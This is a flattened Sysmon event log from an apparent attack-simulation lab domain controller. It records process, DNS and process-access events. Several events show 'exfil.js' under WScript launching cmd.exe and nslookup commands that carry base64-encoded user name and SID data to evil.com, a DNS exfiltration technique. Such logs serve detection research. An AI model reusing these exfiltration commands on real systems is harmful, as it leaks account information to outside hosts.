14:16:16.827{2E1864BB-17B0-629A-CC3E-000000005F02}23087076C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.836{2E1864BB-17B0-629A-CE3E-000000005F02}5776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhovqp.tmp 2>&1 10341000x8000000000000000196596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.805{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.805{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.793{2E1864BB-17B0-629A-CD3E-000000005F02}40124572C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.759{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CD3E-000000005F02}4012C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.743{2E1864BB-17A1-629A-783D-000000005F02}55523448C:\Windows\System32\WScript.exe{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.747{2E1864BB-17B0-629A-CC3E-000000005F02}2308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhovqp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.727{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqvt.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.690{2E1864BB-17B0-629A-CA3E-000000005F02}37967272C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.674{2E1864BB-17B0-629A-C93E-000000005F02}73723288C:\Windows\system32\cmd.exe{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.684{2E1864BB-17B0-629A-CB3E-000000005F02}4100C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqqvt.tmp 2>&1 354300x8000000000000000196576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52348- 354300x8000000000000000196575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52347- 354300x8000000000000000196574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52346- 354300x8000000000000000196573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.199{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-52346-false127.0.0.1-53domain 354300x8000000000000000196572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52345- 354300x8000000000000000196571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52344- 354300x8000000000000000196570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52343- 354300x8000000000000000196569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.106{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-52343-false127.0.0.1-53domain 354300x8000000000000000196568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52342- 354300x8000000000000000196567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52341- 354300x8000000000000000196566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.044{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52340- 354300x8000000000000000196565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.044{00000000-0000-0000-0000-000000000000}684<unknown process>-udptruefalse127.0.0.1-52340-false127.0.0.1-53domain 10341000x8000000000000000196564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.627{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CA3E-000000005F02}3796C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.627{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B0-629A-CA3E-000000005F02}3796C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.622{2E1864BB-17B0-629A-CA3E-000000005F02}37967272C:\Windows\system32\conhost.exe{2E1864BB-17B0-629A-C93E-000000005F02}7372C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B0-629A-CA3E-000000005F02}3796C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.590{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 